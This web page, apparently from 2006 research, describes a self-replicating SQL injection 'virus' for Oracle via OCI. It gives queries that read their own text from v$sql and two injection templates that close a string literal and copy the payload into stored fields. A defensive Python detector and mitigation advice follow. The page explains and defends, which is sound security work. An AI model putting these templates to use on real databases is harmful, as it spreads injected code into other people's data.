
SQL Virus Using Self-Referential Queries for Oracle (OCI)


The currently executing query can be obtained using the SQL_TEXT field of the v$sql view, which provides access to all currently executing queries. To access the v$sql view, the user must be an administrator.

The correct query can be extracted from this table using the following query:

SELECT sql.SQL_TEXT from v$sql sql, v$session ses, v$mystat sta WHERE sql.sql_id=ses.sql_id AND ses.sid=sta.sid AND sta.STATISTIC#=0

Query 1 - Self-referential query for Oracle

It is also possible to select the correct query by including a unique string in the query and filtering on this string, as in the query below.

select SQL_TEXT FROM v$sql WHERE INSTR(SQL_TEXT, 'unique string')>0

Query 2 - Self-referential query for Oracle

In this case, the unique string in the filter is also the string that is found in the v$sql view.
This query is shorter than the first example, but may fail if the string is not unique, as this would cause the query to return multiple results, which causes an error if a single result was expected.

On Oracle, the following code will perform the attack, when using the OCI API:

%content%',NewContents=(SELECT SUBSTR(SQL_TEXT,43,%len%)FROM v$sql WHERE INSTR(SQL_TEXT,'%payload%')>0)--

Exploit 1 - Oracle (OCI) exploit using single query

In this example, %len% is the length of the entire exploit, after the content and payload have been included. The payload is used both as an attack and to select the proper query from the v$sql view. This will cause the attack to fail if multiple instances run at the same time, as the SELECT query returns multiple values.

Exploit 2 shows a more reliable Oracle exploit, but this one is considerably larger.

%content%',NewContents=(SELECT SUBSTR (sql.SQL_TEXT, 43, %len%) from v$sql sql, v$session ses, v$mystat sta WHERE sql.sql_id=ses.sql_id AND ses.sid=sta.sid AND sta.STATISTIC#=0)--%payload%

Exploit 2 - Reliable Oracle (OCI) exploit using single query
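
A defensive counterpart to the two templates above, added here as an example and not part of the original page: a heuristic filter that flags stored field values which read SQL_TEXT from the views these queries rely on. The function names are hypothetical, the first two sample values are constructed, and the last two are the templates from this page with their placeholders left unfilled.

```python
import re

# Views named in the page's queries, plus the SYS.V_$ base names and GV$ variants.
VIEW_RE = re.compile(r"\bG?V_?\$(?:SQL|SESSION|MYSTAT)\b", re.IGNORECASE)
COLUMN_RE = re.compile(r"\bSQL_TEXT\b", re.IGNORECASE)
# A quote followed by ',' or ')' suggests the value closes the literal it sits in.
BREAKOUT_RE = re.compile(r"'\s*[,)]")


def indicators(value: str) -> list[str]:
    """List the reasons a stored field value resembles a self-referential query."""
    found = []
    views = sorted({m.group(0).upper() for m in VIEW_RE.finditer(value)})
    if views:
        found.append("reads " + ", ".join(views))
    if COLUMN_RE.search(value):
        found.append("reads SQL_TEXT")
    if BREAKOUT_RE.search(value):
        found.append("closes a string literal")
    if "--" in value:
        found.append("contains a -- comment marker")
    return found


def is_self_referential(value: str) -> bool:
    """True when the value reads the statement text from one of the views."""
    return bool(VIEW_RE.search(value)) and bool(COLUMN_RE.search(value))


# Two constructed benign values, then the two templates from this page
# (hypothetical harness; placeholders such as %len% are left unfilled).
SAMPLES = [
    "Apples",
    "O'Brien -- returned 2006-02-27",
    "%content%',NewContents=(SELECT SUBSTR(SQL_TEXT,43,%len%)FROM v$sql "
    "WHERE INSTR(SQL_TEXT,'%payload%')>0)--",
    "%content%',NewContents=(SELECT SUBSTR (sql.SQL_TEXT, 43, %len%) from v$sql sql, "
    "v$session ses, v$mystat sta WHERE sql.sql_id=ses.sql_id AND ses.sid=sta.sid "
    "AND sta.STATISTIC#=0)--%payload%",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(is_self_referential(sample), indicators(sample))
```

Pattern matching of this kind is a tripwire for logging and triage. Binding the value as a parameter and running the application under an account that cannot read v$sql remove the condition the queries depend on.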


Last modified: Monday, 27 February 2006 14:33, CET